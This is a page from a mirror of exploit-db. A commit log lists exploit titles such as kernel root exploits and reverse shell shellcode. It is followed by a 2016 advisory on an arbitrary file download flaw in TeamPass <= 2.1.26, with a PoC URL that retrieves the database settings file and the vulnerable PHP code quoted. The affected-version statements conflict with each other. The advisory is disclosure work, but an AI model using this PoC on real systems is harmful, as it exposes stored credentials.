bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/40140.txt
Offensive Security 789febc361 DB: 2016-07-22 
4 new exploits

Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Local Proof of Concept (1)
Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Local Proof of Concept (2)
Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (1)
Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (2)

Linux Kernel <= 2.4.23 / <= 2.6.0 - 'mremap()' Bound Checking Root Exploit (3)
Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Root Exploit (3)

Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Local Proof of Concept (2)
Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Validator (Proof of Concept) (1)

Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Missing 'do_munmap' Exploit (1)
Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Local Root Exploit (2)

Linux Kernel <= 2.4.29-rc2 - 'uselib()' Privilege Elevation (1)
Linux Kernel <= 2.4.29-rc2 - 'uselib()' Privilege Escalation (1)

Linux Kernel 2.4 - 'uselib()' Privilege Elevation Exploit (2)
Linux Kernel 2.4 - 'uselib()' Privilege Escalation Exploit (2)

Linux Kernel 2.4 / 2.6 x86_64) - System Call Emulation Exploit
Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Local Root Exploit

TFTP Server 1.4 - ST Buffer Overflow Exploit (0Day)
TFTP Server 1.4 - ST Buffer Overflow Exploit

Linux Kernel < 2.6.22 - ftruncate()/open() Local Exploit
Linux Kernel < 2.6.22 - ftruncate()/open() Local Root Exploit

MuPDF pdf_shade4.c Multiple Stack-Based Buffer Overflows
MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack-Based Buffer Overflows

(Linux Kernel <= 2.6.34-rc3) ReiserFS xattr (Redhat/Ubuntu 9.10) - Privilege Escalation
ReiserFS xattr (Linux Kernel <= 2.6.34-rc3) (Redhat / Ubuntu 9.10) - Privilege Escalation

Microsoft ASN.1 Library Bitstring Heap Overflow
Microsoft Windows - ASN.1 Library Bitstring Heap Overflow (MS04-007)

Linux Kernel 2.0 / 2.1 / 2.2 - autofs

Linux Kernel 2.2 - ldd core Force Reboot
Linux Kernel 2.2 - 'ldd core' Force Reboot
OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1)
OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2)
OpenSSH 3.x - Challenge-Response Buffer Overflow Vulnerabilities (1)
OpenSSH 3.x - Challenge-Response Buffer Overflow Vulnerabilities (2)

Linux Kernel Samba 2.2.8 (Debian/Mandrake) - Share Local Privilege Elevation
Linux Kernel Samba 2.2.8 (Debian / Mandrake) - Share Local Privilege Escalation

Linux Kernel 3.14-rc1 <= 3.15-rc4 - Raw Mode PTY Local Echo Race Condition Local Privilege Escalation (x64)
Linux Kernel 3.14-rc1 <= 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Local Privilege Escalation

Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow Proof of Concept
Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (Proof of Concept)

Apport/Abrt - Local Root Exploit
Apport/Abrt (Ubuntu / Fedora) - Local Root Exploit

Ubuntu usb-creator 0.2.x - Local Privilege Escalation
usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Local Privilege Escalation

Apport/Ubuntu - Local Root Race Condition
Apport (Ubuntu 14.04/14.10/15.04) - Local Root Race Condition

Linux Kernel 4.4.0-2 (Ubuntu 16.04) - netfilter target_offset OOB Local Root Exploit
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - netfilter target_offset OOB Local Root Exploit
TFTP Server 1.4 - WRQ Buffer Overflow Exploit (Egghunter)
Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal (84_ 122_ 172 bytes)
TeamPass Passwords Management System 2.1.26 - Arbitrary File Download
2016-07-22 05:05:29 +00:00

66 lines
No EOL
1.9 KiB
Text
Executable file
Raw Blame History

1. ADVISORY INFORMATION
========================================
Title: TeamPass Passwords Management System via Unauth File Download and Arbitrary File Download
Application: TeamPass Passwords Management System
Class: Sensitive Information disclosure
Remotely Exploitable: Yes
Versions Affected: TeamPass Passwords Management System <= 2.1.26
Bugs: Arbitrary File Download
Date of found: 21.03.2016
Reported: 09.05.2016
Date of Public Advisory: 13.05.2016
Author: Hasan Emre Ozer
2. CREDIT
========================================
This vulnerability was identified during penetration test
by Hasan Emre Ozer & Halit Alptekin from PRODAFT / INVICTUS
Thank you Mehmet Ince for support
3. DESCRIPTION
========================================
We deciced to publish the vulnerability after its fix in release 2.1.26
4. VERSIONS AFFECTED
========================================
TeamPass Passwords Management System <= 2.1.10
5. TECHNICAL DETAILS & POC
========================================
Using 'downloadFile.php' file from 'sources' directory we can download any file.
Proof of Concept (POC)
Example for downloading database configuration:
http://teampass/sources/downloadFile.php?sub=includes&file=settings.php
Technical Details
<?php
......
header("Content-disposition: attachment; filename=".rawurldecode($_GET['name']));
header("Content-Type: application/octet-stream");
header("Pragma: public");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0, public");
header("Expires: 0");
readfile('../'.$_GET['sub'].'/'.basename($_GET['file']));
?>
$_GET['sub'] and $_GET['file'] parameters vulnerable in readfile function.
6. SOLUTION
========================================
Update to the latest version v2.1.26
7. REFERENCES
========================================
http://teampass.net/2016-05-13-release-2.1.26
Reference in a new issue View git blame Copy permalink